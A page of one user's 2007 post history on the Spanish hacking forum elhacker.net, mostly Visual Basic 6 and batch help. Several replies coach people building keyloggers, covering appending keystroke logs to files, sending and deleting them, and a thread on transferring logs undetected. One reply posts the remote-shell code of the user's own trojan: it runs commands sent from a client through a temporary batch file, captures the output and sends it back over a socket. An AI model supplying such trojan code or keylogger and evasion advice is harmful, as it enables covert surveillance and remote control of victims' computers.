elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15
61  Programación / Programación Visual Basic / Re: problema con keylogger en vb6 en: 28 Abril 2007, 19:56 pm
Código:
  Open "C:\log" & n & ".txt" For Append As fnum
62  Programación / Programación Visual Basic / Re: problema con keylogger en vb6 en: 28 Abril 2007, 19:04 pm
Esque te complicas la vida.
Mira como dices cuando el label llega a 1800(este truco lo podrias optimizar que es una chapuza,xD)Pues como dices graba el archivos de texto,bien,pues lo envias y lo eliminas.
Pero es que no te entiendo,append escribe a continuacion,sino existe lo crea,cual es tu problema?
La hora si se repite,xD,la fecha tambien,si pones intervalo 1800,xD,digo yo que en 24 horas no canvia,y la hora al dia siguiente,pues....
Puedes comprobar si el archvio existe y entonces realizar una accion,por ejemplo cambiar el nombre con que lo ibas a guardar.
Peor no entendi tu pregunta,explciate mejor.
63  Programación / Programación Visual Basic / Re: problema con keylogger en vb6 en: 28 Abril 2007, 17:37 pm
En vez de output(qu si existe sobreescribe) usa Append que si existe escribe a continuacion.
No sé si esa es tu duda.
64  Programación / Scripting / Re: mantener ventana en Batch en: 28 Abril 2007, 16:16 pm
Código:
@echo Hola como estas
pause
Es eso a lo que te referias?
Espero qeu te sirva.
Saludos.
65  Programación / Programación Visual Basic / Re: Tutorial de Detector de IP local 100% certero Perfectamente Explicado en: 27 Abril 2007, 17:51 pm
Usando net view del ms-dos por ejemplo y luego ir haciendo un ping a cada una de ellas

Si,pero eso no es desde codigo,igual se podria guardar el resultado y sacar los datos que interesan...pero no sé.
Eso ya lo sabia por eso dije que desde codigo no sabia.
Igual algunos de vosostros si.
Saludos.
66  Programación / Programación Visual Basic / Re: Tutorial de Detector de IP local 100% certero Perfectamente Explicado en: 26 Abril 2007, 18:19 pm
Pues aqui el nombre de los equipos:
Código:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComputerDescriptions
Y para la IP ni idea,desde codigo no sé.
67  Programación / Programación Visual Basic / Re: Necesito ideas (formas) de transferir un log sin ser detectado. en: 24 Abril 2007, 22:52 pm
La última pregunta no la entiendo, EN PRINCIPIO porque va a ser detectable abrir una web con internetexplorer?
El kaspersky si lo detecta.
Saludos.
68  Programación / Programación Visual Basic / Re: Duda con txt en: 22 Abril 2007, 23:49 pm
Código:
Open "C:\yo.txt" For Input As #1
Dim texto as string
texto = Input(LOF(1), #1)
Close #1
text1.text=texto
Espero que te sirva.
Saludos.
69  Programación / Programación Visual Basic / Re: Variable en: 22 Abril 2007, 12:30 pm
no es 1 nombre, eso solo hera 1 ejemplo es para añadir el text1 a una url, no es tan basico es distinto.
Que mas da un nombre o una url esto es muy basico,no te ofendas,y que sea un nombre o una url no tiene nada que ver.
Saludos.
70  Programación / Programación Visual Basic / Re: AyUdA!!!!plx! problema con cmd pipe en vb6 tengo el code y todo pero... en: 21 Abril 2007, 16:56 pm
Código:
Open "c:\test.bat" For Binary As #1
Put #1, , "@echo off" & vbCrLf
Put #1, , sdata(1) & ">>c:\log.txt" & vbCrLf
Put #1, , "exit"
Close #1
Open "c:\log.txt" For Input As #1
conten = Input(LOF(1), #1)
Close #1
WS.SendData "no|" & conten
Shell "c:\test.bat"
Kill "c:\test.bat"

Mira la remote shell de mi troyano(se puede optimizar en vez de crear bats hacer shell"" pero bueh...)lo que hago es desde el cliente enviar el comando,y como ves lo pone en un bat,esto:
Código:
>>c:\log.txt
previamente el comando lo que hace es guardar la respuesta en un archivo de texto situado en c: con nombre log.txt,bien pues luego lo leemos con el input,y lo enviamos al cliente y ya tenemos nuesra remote shell.
Ejecutamso el bat para que se ejecute el comando,y eliminamos luego el bat y el archivo de texto con el resultado.
Espero qeu te sirva saludos.
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines